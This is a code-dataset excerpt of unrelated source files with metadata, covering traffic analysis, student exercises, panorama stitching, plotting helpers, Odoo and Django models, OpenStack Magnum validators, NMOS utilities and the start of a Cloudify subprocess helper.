v_sd_all.extend(v_sd)\n d_sd_all.extend(d_sd)\n\npd_dict = {'v_t': v_t_all, 'v_sd': v_sd_all, 'd_sd': d_sd_all}\ndf = pd.DataFrame(pd_dict)\ndf.to_json(r'./leftturn_result_new.json')\n# for matlab\nsio.savemat(\"./leftturn_result_new.mat\",\n {\"v_t_all\": v_t_all,\n \"v_sd_all\": v_sd_all,\n \"d_sd_all\": d_sd_all})\n\nif show_area:\n config, _ = readFile(config_path)\n\n image_with_detection = './images/leftturn00/detection.png'\n areas = [config[\"lefeturn_area\"], config[\"straight_area\"],\n polygonIntersction(config[\"lefeturn_area\"], config[\"straight_area\"]),\n polygonNonIntersect(config[\"straight_area\"], config[\"lefeturn_area\"])]\n\n showAreaImage(image_with_detection, areas)\n\nprint(\"END\")\n","sub_path":"leftturn.py","file_name":"leftturn.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"607624943","text":"casuali = []\r\nn = int (input (\"quanti numeri ci devono essere da 1 a 20?\"))\r\ncontatore = n\r\ndiv = 2\r\n\r\nfor i in range (n):\r\n numero = randint (1,20)\r\n while numero in casuali:\r\n numero = randint (1,20)\r\n if numero not in casuali:\r\n casuali.append (numero)\r\n\r\nprint (\"la lista è\", casuali)\r\n\r\nfor numero in casuali:\r\n while True:\r\n if numero == div:\r\n div = 2\r\n break\r\n elif numero % div != 0:\r\n div += 1\r\n else:\r\n contatore -= 1\r\n div = 2\r\n break\r\nprint (\"i numeri primi sono\", contatore)","sub_path":"es_6.py","file_name":"es_6.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"415377760","text":"def solution(n):\n memo = [0] * (n + 1)\n memo[1] = 1\n memo[2] = 2\n for i in range(3, n + 1):\n memo[i] = (memo[i - 1] + memo[i - 2]) % 1000000007\n\n return memo[n]\n\n\nn1 = 4\nn2 = 60000\n\nprint(solution(n1))\nprint(solution(n2))\n","sub_path":"programmers-python/연습문제/LV2_2xn_타일링.py","file_name":"LV2_2xn_타일링.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"498799408","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nPlotting functions for property histograms.\n\"\"\"\n\n#...for the logging.\nimport logging as lg\n\n#...for the MATH.\nimport math\n\n#...for even more MATH.\nimport numpy as np\n\n# Import the plotting libraries.\nimport pylab as plt\n\n#...for the colours. Oh, the colours!\nfrom matplotlib.colors import LogNorm\n\n# Load the LaTeX text plot libraries.\nfrom matplotlib import rc\n\n# Uncomment to use LaTeX for the plot text.\n#rc('font',**{'family':'serif','serif':['Computer Modern']})\n#rc('text', usetex=True)\n\nclass Hist():\n \"\"\" Wrapper class for 1D property histograms. \"\"\"\n\n def __init__(self, name, num, data, nbins, xlabel, ylabel, outputpath):\n\n plt.close('all')\n\n ## The property histogram plot.\n p = plt.figure(num, figsize=(5.0, 3.0), dpi=150, facecolor='w', edgecolor='w')\n\n # Adjust the position of the axes.\n p.subplots_adjust(bottom=0.17, left=0.15)\n\n ## The plot axes.\n pax = p.add_subplot(111)\n\n # y axis\n plt.ylabel('%s' % (ylabel))\n\n # x axis\n plt.xlabel('%s' % (xlabel))\n\n # Add a grid.\n plt.grid(1)\n\n ## The x minimum.\n xmin = 0\n\n ## The x maximum.\n xmax = max(data) + 5\n\n if nbins < 0:\n n, bins, patches = plt.hist(data, range(int(xmin),int(xmax),1), histtype='stepfilled')\n else:\n n, bins, patches = plt.hist(data, nbins, histtype='stepfilled')\n\n # Set the plot's visual properties.\n plt.setp(patches, 'facecolor', 'g', 'alpha', 0.75, 'linewidth', 0.0)\n\n # Save the figure.\n p.savefig(\"%s/%s.png\" % (outputpath, name))\n\nclass Hist2D:\n \"\"\" Wrapper class for 2D property vs. property histograms. \"\"\"\n\n def __init__(self, num, name, x_data, x_ax_label, x_nbins, y_data, y_ax_label, y_nbins, outputpath):\n\n plt.close('all')\n\n ## The histogram plot.\n plot = plt.figure(num, figsize=(5.0, 3.0), dpi=150, facecolor='w', edgecolor='w')\n\n # Adjust the position of the axes.\n plot.subplots_adjust(bottom=0.17, left=0.15)\n\n ## The plot axes.\n plotax = plot.add_subplot(111)\n\n # Set the y axis label.\n plt.ylabel(y_ax_label)\n\n # Set the x axis label.\n plt.xlabel(x_ax_label)\n\n # Add a grid.\n plt.grid(1)\n\n # Plot the 2D histogram.\n plt.hist2d(x_data, y_data, bins=[x_nbins, y_nbins], norm=LogNorm())\n\n # Add a colour bar.\n plt.colorbar()\n\n # Save the figure.\n plot.savefig(\"%s/%s.png\" % (outputpath, name))\n","sub_path":"plotting/histograms.py","file_name":"histograms.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"333629144","text":"# ASSIGNMENT 8\n# Your Name\n\nimport numpy as np\nimport scipy as sp\nimport scipy.signal\nimport cv2\n\n# Import ORB as SIFT to avoid confusion.\n# try:\n# from cv2 import ORB as SIFT\n# except ImportError:\n# try:\n# from cv2 import SIFT\n# except ImportError:\n# try:\n# SIFT = cv2.ORB_create\n# except:\n# raise AttributeError(\"Your OpenCV(%s) doesn't have SIFT / ORB.\"\n# % cv2.__version__)\n\n\n\"\"\" Assignment 8 - Panoramas\n\nThis file has a number of functions that you need to fill out in order to\ncomplete the assignment. Please write the appropriate code, following the\ninstructions on which functions you may or may not use.\n\nGENERAL RULES:\n 1. DO NOT INCLUDE code that saves, shows, displays, writes the image that\n you are being passed in. Do that on your own if you need to save the images\n but the functions should NOT save the image to file. (This is a problem\n for us when grading because running 200 files results a lot of images being\n saved to file and opened in dialogs, which is not ideal). Thanks.\n\n 2. DO NOT import any other libraries aside from the three libraries that we\n provide. You may not import anything else, you should be able to complete\n the assignment with the given libraries (and in most cases without them).\n\n 3. DO NOT change the format of this file. Do not put functions into classes,\n or your own infrastructure. This makes grading very difficult for us. Please\n only write code in the allotted region.\n\"\"\"\n\ndef getImageCorners(image):\n \"\"\" For an input image, return its four corners.\n\n You should be able to do this correctly without instruction. If in doubt,\n resort to the testing framework. The order in which you store the corners\n does not matter.\n\n Note: The reasoning for the shape of the array can be explained if you look\n at the documentation for cv2.perspectiveTransform which we will use on the\n output of this function. Since we will apply the homography to the corners\n of the image, it needs to be in that format.\n\n Another note: When storing your corners, they are assumed to be in the form\n (X, Y) -- keep this in mind and make SURE you get it right.\n\n Args:\n image (numpy.ndarray): Input can be a grayscale or color image.\n\n Returns:\n corners (numpy.ndarray): Array of shape (4, 1, 2). Type of values in the\n array is np.float32.\n \"\"\"\n # WRITE YOUR CODE HERE\n \n h, w = image.shape[:2]\n corners = np.array([[[0,0]], [[w,0]], [[0,h]], [[w,h]]], dtype=np.float32)\n\n return corners\n # END OF FUNCTION\n\ndef findMatchesBetweenImages(image_1, image_2, num_matches):\n \"\"\" Return the top list of matches between two input images.\n\n Note: You will not be graded for this function. This function is almost\n identical to the function in Assignment 7 (we just parametrized the number\n of matches). We expect you to use the function you wrote in A7 here. We will\n also release a solution for how to do this after A7 submission has closed.\n\n If your code from A7 was wrong, don't worry, you will not lose points in\n this assignment because your A7 code was wrong (hence why we will provide a\n solution for you after A7 closes).\n\n This function detects and computes SIFT (or ORB) from the input images, and\n returns the best matches using the normalized Hamming Distance through brute\n force matching.\n\n Args:\n image_1 (numpy.ndarray): The first image (grayscale).\n image_2 (numpy.ndarray): The second image. (grayscale).\n num_matches (int): The number of desired matches. If there are not\n enough, return as many matches as you can.\n\n Returns:\n image_1_kp (list): The image_1 keypoints, the elements are of type\n cv2.KeyPoint.\n image_2_kp (list): The image_2 keypoints, the elements are of type \n cv2.KeyPoint.\n matches (list): A list of matches, length 'num_matches'. Each item in \n the list is of type cv2.DMatch. If there are less \n matches than num_matches, this function will return as\n many as it can.\n\n \"\"\"\n\n # COPY YOUR CODE FROM A7 HERE.\n\n detector = cv2.ORB()\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n \n image_1_kp, image_1_desc = detector.detectAndCompute(image_1, None)\n image_2_kp, image_2_desc = detector.detectAndCompute(image_2, None)\n matches = matcher.match(image_1_desc, image_2_desc)\n matches = sorted(matches, key = lambda x:x.distance)\n \n# matchImg = drawMatches(image_1, image_1_kp, image_2, image_2_kp, matches[:num_matches])\n# cv2.imshow(\"matches\", matchImg.astype(np.uint8))\n# cv2.waitKey(1000)\n \n return image_1_kp, image_2_kp, matches[:num_matches]\n\n # END OF FUNCTION.\n\ndef findHomography(image_1_kp, image_2_kp, matches):\n \"\"\" Returns the homography between the keypoints of image 1, image 2, and\n its matches.\n\n Follow these steps:\n 1. Iterate through matches and:\n 1a. Get the x, y location of the keypoint for each match. Look up\n the documentation for cv2.DMatch. Image 1 is your query image,\n and Image 2 is your train image. Therefore, to find the correct\n x, y location, you index into image_1_kp using match.queryIdx,\n and index into image_2_kp using match.trainIdx. The x, y point\n is stored in each keypoint (look up documentation).\n 1b. Set the keypoint 'pt' to image_1_points and image_2_points, it\n should look similar to this inside your loop:\n image_1_points[match_idx] = image_1_kp[match.queryIdx].pt\n # Do the same for image_2 points.\n\n 2. Call cv2.findHomography and pass in image_1_points, image_2_points,\n use method=cv2.RANSAC and ransacReprojThreshold=5.0. I recommend\n you look up the documentation on cv2.findHomography to better\n understand what these parameters mean.\n 3. cv2.findHomography returns two values, the homography and a mask.\n Ignore the mask, and simply return the homography.\n\n Args:\n image_1_kp (list): The image_1 keypoints, the elements are of type\n cv2.KeyPoint.\n image_2_kp (list): The image_2 keypoints, the elements are of type \n cv2.KeyPoint.\n matches (list): A list of matches. Each item in the list is of type\n cv2.DMatch.\n Returns:\n homography (numpy.ndarray): A 3x3 homography matrix. Each item in\n the matrix is of type numpy.float64.\n \"\"\"\n image_1_points = np.zeros((len(matches), 1, 2), dtype=np.float32)\n image_2_points = np.zeros((len(matches), 1, 2), dtype=np.float32)\n\n # WRITE YOUR CODE HERE.\n \n for i, match in enumerate(matches):\n image_1_points[i] = image_1_kp[match.queryIdx].pt\n image_2_points[i] = image_2_kp[match.trainIdx].pt\n \n H, mask = cv2.findHomography(image_1_points, image_2_points, method=cv2.RANSAC, ransacReprojThreshold=5.0)\n \n return H\n # END OF FUNCTION\n\ndef blendImagePair(warped_image, image_2, point):\n \"\"\" This is the blending function. We provide a basic implementation of\n this function that we would like you to replace.\n\n This function takes in an image that has been warped and an image that needs\n to be inserted into the warped image. Lastly, it takes in a point where the\n new image will be inserted.\n\n The current method we provide is very simple, it pastes in the image at the\n point. We want you to replace this and blend between the images.\n\n We want you to be creative. The most common implementation would be to take\n the average between image 1 and image 2 only for the pixels that overlap.\n That is just a starting point / suggestion but you are encouraged to use\n other approaches.\n\n Args:\n warped_image (numpy.ndarray): The image provided by cv2.warpPerspective.\n image_2 (numpy.ndarray): The image to insert into the warped image.\n point (numpy.ndarray): The point (x, y) to insert the image at.\n\n Returns:\n image: The warped image with image_2 blended into it.\n \"\"\"\n \n # need to generate a properly sized and translated image_2\n image_2_resize = np.zeros(warped_image.shape, dtype=np.uint8)\n image_2_resize[point[1]:image_2.shape[0]+point[1], \\\n point[0]:image_2.shape[1]+point[0]] = image_2\n \n # find the binary union of the two images\n warpGrey = cv2.cvtColor(warped_image, cv2.COLOR_BGR2GRAY)\n image2Grey = cv2.cvtColor(image_2_resize, cv2.COLOR_BGR2GRAY)\n warpMask = 1 - np.logical_not(warpGrey)\n image2Mask = 1 - np.logical_not(image2Grey)\n unionMask = np.logical_and(warpGrey, image2Grey)\n \n # find the extents of the union, column-wise\n colSum = np.sum(unionMask, axis = 0)\n start = np.where(colSum != 0)[0][0]\n end = np.where(colSum != 0)[0][-1]\n \n # create a weighting image based on the union and a gradient across the columns\n weight = np.zeros(warpGrey.shape, dtype=np.float32)\n for i, col in enumerate(unionMask.T[start:end]):\n weight[:,start+i] = col * (1 - i / float(end-start))\n \n # create a weighted image mask for image_2 \n image2Mask = image2Mask.astype(np.float32) - weight\n \n # apply the weighting to blend the images\n output_image = np.zeros(warped_image.shape, dtype=np.uint8)\n if len(warped_image.shape) == 3:\n for i in range(warped_image.shape[2]):\n output_image[:,:,i] = (1 - image2Mask) * warped_image[:,:,i] + image2Mask * image_2_resize[:,:,i]\n else:\n output_image = (1 - image2Mask) * warped_image + image2Mask * image_2_resize \n\n return output_image\n # END OF FUNCTION\n\ndef warpImagePair(image_1, image_2, homography):\n \"\"\" Warps image 1 so it can be blended with image 2 (stitched).\n\n Follow these steps:\n 1. Obtain the corners for image 1 and image 2 using the function you\n wrote above.\n \n 2. Transform the perspective of the corners of image 1 by using the\n image_1_corners and the homography to obtain the transformed corners.\n \n Note: Now we know the corners of image 1 and image 2. Out of these 8\n points (the transformed corners of image 1 and the corners of image 2),\n we want to find the minimum x, maximum x, minimum y, and maximum y. We\n will need this when warping the perspective of image 1.\n\n 3. Join the two corner arrays together (the transformed image 1 corners,\n and the image 2 corners) into one array of size (8, 1, 2).\n\n 4. For the first column of this array, find the min and max. This will\n be your minimum and maximum X values. Store into x_min, x_max.\n\n 5. For the second column of this array, find the min and max. This will\n be your minimum and maximum Y values. Store into y_min, y_max.\n\n 6. Create a translation matrix that will shift the image by the required\n x_min and y_min (should be a numpy.ndarray). This looks like this:\n [[1, 0, -1 * x_min],\n [0, 1, -1 * y_min],\n [0, 0, 1]]\n\n Note: We'd like you to explain the reasoning behind multiplying the\n x_min and y_min by negative 1 in your writeup.\n\n 7. Compute the dot product of your translation matrix and the homography\n in order to obtain the homography matrix with a translation.\n\n 8. Then call cv2.warpPerspective. Pass in image 1, the dot product of\n the matrix computed in step 6 and the passed in homography and a vector\n that will fit both images, since you have the corners and their max and\n min, you can calculate it as (x_max - x_min, y_max - y_min).\n\n 9. To finish, you need to blend both images. We have coded the call to\n the blend function for you.\n\n Args:\n image_1 (numpy.ndarray): Left image.\n image_2 (numpy.ndarray): Right image.\n homography (numpy.ndarray): 3x3 matrix that represents the homography\n from image 1 to image 2.\n\n Returns:\n output_image (numpy.ndarray): The stitched images.\n \"\"\"\n # WRITE YOUR CODE HERE\n\n # find image corners\n corners_1 = getImageCorners(image_1)\n corners_2 = getImageCorners(image_2)\n \n # transform image 1 corners to find the extents of the warped image\n for i, c in enumerate(corners_1[:,0,:]):\n cWarp = np.dot(homography, [c[0], c[1], 1.0])\n# corners_1[i,0,:] = cWarp[:2] \n corners_1[i,0,:] = cWarp[:2] / cWarp[2]\n \n #corners_1 = cv2.perspectiveTransform(corners_1, homography) \n \n # find max and min image coordinates\n corners = np.concatenate((corners_1, corners_2))\n x_min = min(corners[:,0,0])\n x_max = max(corners[:,0,0])\n y_min = min(corners[:,0,1])\n y_max = max(corners[:,0,1])\n \n # create translation matrix to shift the warped image back in view\n T = np.array([[1, 0, -x_min], \\\n [0, 1, -y_min], \\\n [0, 0, 1]])\n \n # combine homography with translation\n TH = np.dot(T, homography)\n \n # warp and translate image 1 \n #ySize = max(max(corners_1[:,0,1]) - min(corners_1[:,0,1]), image_2.shape[0])\n #xSize = int(image_2.shape[1] - x_min)\n ySize = y_max - y_min\n xSize = x_max - x_min\n warped_image = cv2.warpPerspective(image_1, TH, (xSize, ySize))\n\n # END OF CODING\n output_image = blendImagePair(warped_image, image_2,\n (-1 * x_min, -1 * y_min))\n\n return output_image\n\ndef drawMatches(image_1, image_1_keypoints, image_2, image_2_keypoints, matches):\n\n # Compute number of channels.\n num_channels = 1\n if len(image_1.shape) == 3:\n num_channels = image_1.shape[2]\n \n # Separation between images.\n margin = 10\n \n # Create an array that will fit both images (with a margin of 10 to separate the two images)\n joined_image = np.zeros((max(image_1.shape[0], image_2.shape[0]),\n image_1.shape[1] + image_2.shape[1] + margin,\n num_channels))\n \n if num_channels != 1:\n for channel_idx in range(num_channels):\n joined_image[:image_1.shape[0],\n :image_1.shape[1],\n channel_idx] = image_1[:,:,channel_idx]\n joined_image[:image_2.shape[0],\n image_1.shape[1] + margin:,\n channel_idx] = image_2[:,:,channel_idx]\n else:\n joined_image[:image_1.shape[0], :image_1.shape[1]] = image_1\n joined_image[:image_2.shape[0], (image_1.shape[1] + margin):] = image_2\n\n for match in matches:\n image_1_point = (int(image_1_keypoints[match.queryIdx].pt[0]),\n int(image_1_keypoints[match.queryIdx].pt[1]))\n image_2_point = (int(image_2_keypoints[match.trainIdx].pt[0] + \\\n image_1.shape[1] + margin),\n int(image_2_keypoints[match.trainIdx].pt[1]))\n\n cv2.circle(joined_image, image_1_point, 5, (0, 0, 255), thickness = -1)\n cv2.circle(joined_image, image_2_point, 5, (0, 255, 0), thickness = -1)\n cv2.line(joined_image, image_1_point, image_2_point, (255, 0, 0), \\\n thickness = 1)\n return joined_image\n\n# Some simple testing.\nif __name__ == \"__main__\":\n\n image_1 = cv2.imread(\"images/source/panorama_1/IMG_2524s.jpg\")\n image_2 = cv2.imread(\"images/source/panorama_1/IMG_2525s.jpg\")\n image_1_kp, image_2_kp, matches = findMatchesBetweenImages(image_1, image_2, 20)\n homography = findHomography(image_1_kp, image_2_kp, matches)\n result = warpImagePair(image_1, image_2, homography)\n cv2.imwrite(\"images/output/panorama_1_result.jpg\", result)","sub_path":"Assignments/Assignment8/assignment8.py","file_name":"assignment8.py","file_ext":"py","file_size_in_byte":16047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"538086439","text":"import dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nfrom utils import Header, make_dash_table, setValue\nimport pandas as pd\nimport pathlib\nimport iddModel.doctor as idoct\nimport numpy as np\n\n\n\ndfUseDataTable = pd.DataFrame([\n ['연도별 의사 국가시험 응시현황',\n '연도별 정기 면허신고 의사 수',\n '연도별 건강보험공단 신고 요양기관 활동 의사 수',\n '연도별 의학대학, 의학전문대학원 현황',\n '연도별 사망률 추계1',\n '연도별 사망률 추계2',\n '연도별 총 인구추계',\n '연도별 군의관 입영정보',\n '활동의사 연령분포표'],\n ['기준연도, 응시자수, 합격자수',\n '연도별, 성별 의사 수',\n '연도별 의사 수',\n '입학자수, 졸업자수, 재학생수',\n '연도별, 성별, 연령별(1세) 사망률',\n '연도별, 성별, 연령별(5세) 사망률',\n '연도별 총 인구수',\n '연도별 군의관 임관 수',\n '연도별, 성별, 연령별(10세) 의사 수'],\n ['한국보건의료인 국가시험원',\n '보건복지부 통계연감',\n '건강보험공단 심사평가원',\n '교육부 통계연감',\n '통계청',\n 'United Nations',\n '통계청',\n '병무청 통계연감',\n '보건복지부 보건의료인력 실태조사'],\n ['1952년~ 2020년',\n '1955년~2019년',\n '2003년~2020년',\n '1977년~2019년',\n '1970년~2047년',\n '1950년~1970년',\n '1950년~2047년',\n '1998년~2019년',\n '2011년~2016년']]).T\n\ndfUseDataTable.index = list(range(1,10))\ndfUseDataTable.columns = ['데이터 명','데이터 항목','출처','비고']\n\ndef create_layout(app,valueSet):\n return html.Div(\n [\n Header(app),\n # page 5\n html.Div(\n [\n # 사용 데이터\n html.Div(\n [\n html.Div('사용 데이터', className=\"subtitle padded\", style={'font-weight': 'bold','fontSize': 18}),\n html.Div(\n [\n html.Br([]),\n html.Div(\n [\n html.Table(\n make_dash_table(dfUseDataTable),\n className=\"tiny-header\",\n )\n ],\n style={\"overflow-x\": \"auto\"},\n ),\n ],\n className=\"twelve columns\",\n )\n ],\n className=\"row \",\n ),\n \n\n ],\n className=\"sub_page\",\n ),\n ],\n className=\"page\",\n )\n ","sub_path":"pages/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"284744001","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api,_\n\n\nclass jolta_coa(models.Model):\n _inherit = 'account.account'\n\n def get_latest_code(self,parent_id):\n self.code = ''\n if self.parent_id and self.parent_id.code:\n self.code = ''\n if self.parent_id.parent_id and not self.parent_id.parent_id.parent_id:\n\n previous_code = self.env['account.account'].search([])\n previous_codes = self.env['account.account'].search([('parent_id', '=', parent_id.id)])\n prev_codes_list = [x.code for x in previous_codes]\n\n if prev_codes_list:\n prev_codes_list = sorted(prev_codes_list)\n prev_latest_code = prev_codes_list[-1].split('-')\n latest_code = int(prev_codes_list[-1].split('-')[-1])\n new_code = str(latest_code + 1)\n account_code = ''\n\n account_code = new_code.zfill(4)\n prev_latest_code.remove(prev_latest_code[-1])\n prev_latest_code.append(account_code)\n new_latestaccount_code = '-'.join(prev_latest_code)\n return new_latestaccount_code\n else:\n parent_code = self.parent_id.code\n latest_code_split = self.parent_id.code.split('-')\n next_code = str(int(self.parent_id.code.split('-')[-1]) + 1).zfill(4)\n latest_code_split.remove(latest_code_split[-1])\n latest_code_split.append(next_code)\n new_latestaccount_code = '-'.join(latest_code_split)\n return new_latestaccount_code\n\n\n\n\n @api.onchange('parent_id')\n def update_account_code(self):\n if self.parent_id:\n acc_code=''\n acc_code= self.get_latest_code(self.parent_id)\n self.code = acc_code\n\n\n\n\n\n\n\n\n","sub_path":"jolta_coa/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"563736669","text":"'''\r\n Crear un programa donde le pases un numero, y te devuelva su tabla de multiplicar\r\n'''\r\n\r\ntabla = input('Dime un numero: ')\r\n\r\ntry: #como el try del try catch\r\n tabla=int(tabla)\r\nexcept: #como el catch del try catch\r\n print('Solo se pueden introducir numeros del 0 al 10...')\r\n\r\n\r\nif(isinstance(tabla, int)):\r\n # range() -> Empieza por 0 va sumando hasta el numero que se le indica - 1\r\n #range(1, 11, 2) -> empieza en 1 y va hasta el 10 de 2 en 2\r\n #range(0, 11, 1) -> Es igual que va por defecto empieza en 0 y va hasta el 10 de 1 en 1\r\n for i in range(11):\r\n print(str(tabla) + ' x ' + str(i) + ' = ' + str((tabla*i)))\r\n","sub_path":"ejer1.py","file_name":"ejer1.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"258183387","text":"# Copyright 2015 Huawei Technologies Co.,LTD.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport decorator\nfrom oslo_config import cfg\nimport pecan\n\nfrom magnum.common import exception\nfrom magnum import objects\n\n\ndef enforce_bay_types(*bay_types):\n @decorator.decorator\n def wrapper(func, *args, **kwargs):\n obj = args[1]\n bay = objects.Bay.get_by_uuid(pecan.request.context, obj.bay_uuid)\n baymodel = objects.BayModel.get_by_uuid(pecan.request.context,\n bay.baymodel_id)\n if baymodel.coe not in bay_types:\n raise exception.InvalidParameterValue(\n 'Cannot fulfill request with a %(bay_type)s bay, '\n 'expecting a %(supported_bay_types)s bay.' %\n {'bay_type': baymodel.coe,\n 'supported_bay_types': '/'.join(bay_types)})\n\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef enforce_network_driver_types_create():\n @decorator.decorator\n def wrapper(func, *args, **kwargs):\n baymodel = args[1]\n _enforce_network_driver_types(baymodel)\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef enforce_network_driver_types_update():\n @decorator.decorator\n def wrapper(func, *args, **kwargs):\n uuid = args[1]\n baymodel = objects.BayModel.get_by_uuid(pecan.request.context, uuid)\n _enforce_network_driver_types(baymodel)\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef _enforce_network_driver_types(baymodel):\n driver = baymodel.network_driver\n if driver:\n validator = Validator.get_coe_validator(baymodel.coe)\n validator.validate_network_driver(driver)\n\n\nclass Validator(object):\n\n @staticmethod\n def get_coe_validator(coe):\n if coe == 'kubernetes':\n return K8sValidator()\n if coe == 'swarm':\n return SwarmValidator()\n if coe == 'mesos':\n return MesosValidator()\n raise exception.InvalidParameterValue(\n 'Requested COE type %s is not supported.' % coe)\n\n @classmethod\n def validate_network_driver(cls, driver):\n cls._validate_network_driver_supported(driver)\n cls._validate_network_driver_allowed(driver)\n\n @classmethod\n def _validate_network_driver_supported(cls, driver):\n \"\"\"Confirm that driver is supported by Magnum for this COE.\"\"\"\n if driver not in cls.supported_drivers:\n raise exception.InvalidParameterValue(\n 'Network driver type %(driver)s is not supported, '\n 'expecting a %(supported_drivers)s network driver.' % {\n 'driver': driver,\n 'supported_drivers': '/'.join(\n cls.supported_drivers + ['unspecified'])})\n\n @classmethod\n def _validate_network_driver_allowed(cls, driver):\n \"\"\"Confirm that driver is allowed via configuration for this COE.\"\"\"\n allowed_drivers = cfg.CONF.baymodel[cls.allowed_driver_config]\n if ('all' not in allowed_drivers and\n driver not in allowed_drivers):\n raise exception.InvalidParameterValue(\n 'Network driver type %(driver)s is not allowed, '\n 'expecting a %(allowed_drivers)s network driver. '\n 'Check %(config)s configuration.' % {\n 'driver': driver,\n 'allowed_drivers': '/'.join(\n allowed_drivers + ['unspecified']),\n 'config': cls.allowed_driver_config})\n\n\nclass K8sValidator(Validator):\n\n supported_drivers = ['flannel']\n allowed_driver_config = 'kubernetes_allowed_network_drivers'\n\n\nclass SwarmValidator(Validator):\n\n supported_drivers = ['docker']\n allowed_driver_config = 'swarm_allowed_network_drivers'\n\n\nclass MesosValidator(Validator):\n\n supported_drivers = ['docker']\n allowed_driver_config = 'mesos_allowed_network_drivers'\n","sub_path":"magnum/api/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"145962137","text":"# Copyright 2017 British Broadcasting Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport uuid\nimport json\nimport os\nimport netifaces\n\nfrom .logger import Logger\n\ndef get_node_id():\n logger = Logger(\"utils\", None)\n node_id_path = \"/var/nmos-node/facade.json\"\n node_id = str(uuid.uuid1())\n try:\n if os.path.exists(node_id_path):\n f = open(node_id_path, \"r\")\n node_id = json.loads(f.read())[\"node_id\"]\n f.close()\n else:\n f = open(node_id_path, \"w\")\n f.write(json.dumps({\"node_id\": node_id}))\n f.close()\n except Exception as e:\n logger.writeWarning(\"Unable to read or write node ID. Using dynamically generated ID\")\n logger.writeWarning(str(e))\n return node_id\n\ndef getLocalIP():\n interfaces= netifaces.interfaces()\n for interface in interfaces:\n if (interface is not None) & (str(interface)[0:2] != 'lo'):\n try:\n for addr in netifaces.ifaddresses(interface)[netifaces.AF_INET]:\n if str(addr['addr'])[0:4] != \"127.\":\n return addr['addr']\n except KeyError:\n pass\n # Could not find an interface\n return None\n","sub_path":"nmoscommon/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"58493555","text":"from django import forms\nfrom .models import Booking\n\n\nclass BookingForm(forms.ModelForm):\n class Meta:\n model = Booking\n fields = ('listing_id', 'customer_id', 'check_in', 'check_out', 'price', 'number_of_guests')\n widgets = {\n 'listing_id': forms.HiddenInput(attrs={'readonly': 'true'}),\n 'customer_id': forms.HiddenInput(attrs={'readonly': 'true'}),\n 'check_in': forms.DateInput(attrs={'class': 'form-control date'}, format='%d-%m-%y'),\n 'check_out': forms.DateInput(attrs={'class': 'form-control date'}, format='%d-%m-%y'),\n 'price': forms.HiddenInput(attrs={'readonly': 'true', 'class': 'form-control price'}),\n 'number_of_guests': forms.NumberInput(attrs={'class': 'form-control form-control-sm '\n 'guest-box text-center text-white p-2',\n 'placeholder': 'Number of Guests',\n 'readonly': 'true'})\n }\n","sub_path":"booking/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"56585021","text":"#!/usr/bin/env python\n\nimport platform\nimport ssl\nimport subprocess\nimport tempfile\nimport os\nfrom cloudify import ctx\nfrom cloudify.state import ctx_parameters as inputs\nfrom cloudify.exceptions import NonRecoverableError\n\nCONFIG = ('\"deployment\": \"{0}\",' +\n '\"instance\": \"{1}\",' +\n '\"tenant\": \"{2}\",' +\n '\"password\": \"{3}\",' +\n '\"user\": \"{4}\",' +\n '\"host\": \"{5}\"')\n\n\ndef execute_command(command, extra_args=None):\n\n ctx.logger.debug('command: {0}.'.format(repr(command)))\n\n subprocess_args = {\n 'args': command,\n 'stdout': subprocess.PIPE,\n 'stderr': subprocess.PIPE\n }\n if extra_args is not None and isinstance(extra_args, dict):\n subprocess_args.update(extra_args)\n\n ctx.logger.debug('subprocess_args {0}.'.format(subprocess_args))\n\n process = subprocess.Popen(**subprocess_args)\n output, error = process.communicate()\n\n ctx.logger.debug('command: {0} '.format(repr(command)))\n ctx.logger.debug('output: {0} 